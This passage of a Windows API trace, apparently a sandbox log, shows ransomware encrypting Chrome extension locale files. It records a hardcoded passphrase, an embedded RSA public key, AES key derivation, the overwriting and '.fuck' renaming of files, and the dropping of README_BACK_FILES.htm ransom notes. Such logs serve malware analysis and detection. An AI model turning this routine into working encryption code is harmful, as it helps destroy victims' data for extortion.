(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json")) returned 0x20 [0254.836] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0254.836] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.837] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.839] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.839] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.842] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.842] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.842] CryptHashData (hHash=0x2e18828, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.842] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.842] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.842] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.842] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10bd8) returned 1 [0254.843] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10bd8, dwCertEncodingType=0x1, pInfo=0x2990480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29904b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29904b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e181e8) returned 1 [0254.843] CryptEncrypt (in: hKey=0x2e181e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.843] CryptEncrypt (in: hKey=0x2e181e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10f08*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10f08*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.844] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e10f08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10f08*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.845] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc8, lpOverlapped=0x0) returned 1 [0254.846] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.846] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.847] CloseHandle (hObject=0x5d5c) returned 1 [0254.847] CloseHandle (hObject=0x5d60) returned 1 [0254.847] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0254.851] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0254.852] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0254.853] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0254.855] CryptDestroyHash (hHash=0x2e18828) returned 1 [0254.855] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.855] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.855] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.855] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.857] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0254.857] AreFileApisANSI () returned 1 [0254.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.857] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.858] GetFileType (hFile=0x5d50) returned 0x1 [0254.858] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.860] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.860] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0254.860] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.860] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.860] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.860] GetLastError () returned 0x0 [0254.860] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json")) returned 0x20 [0254.861] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0254.861] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.862] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.863] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.864] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.867] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.867] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.867] CryptHashData (hHash=0x2e180e8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.867] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.867] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.867] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.867] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10e80) returned 1 [0254.868] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10e80, dwCertEncodingType=0x1, pInfo=0x298f9f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298fa20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298fa28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e189e8) returned 1 [0254.868] CryptEncrypt (in: hKey=0x2e189e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.868] CryptEncrypt (in: hKey=0x2e189e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10578*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10578*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.868] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10578*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10578*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.870] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0254.871] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.872] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.872] CloseHandle (hObject=0x5d60) returned 1 [0254.872] CloseHandle (hObject=0x5d5c) returned 1 [0254.872] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0254.876] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0254.877] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0254.878] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0254.880] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0254.880] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.880] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.880] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.880] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0254.880] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0254.880] AreFileApisANSI () returned 1 [0254.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.881] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.881] GetFileType (hFile=0x5d50) returned 0x1 [0254.882] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.883] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.883] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0254.884] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.884] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.884] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.884] GetLastError () returned 0x0 [0254.884] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json")) returned 0x20 [0254.884] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json", dwFileAttributes=0x80) returned 1 [0254.886] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.886] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.888] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.889] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.892] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.892] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.892] CryptHashData (hHash=0x2e18128, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.892] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e186a8) returned 1 [0254.892] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.892] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, 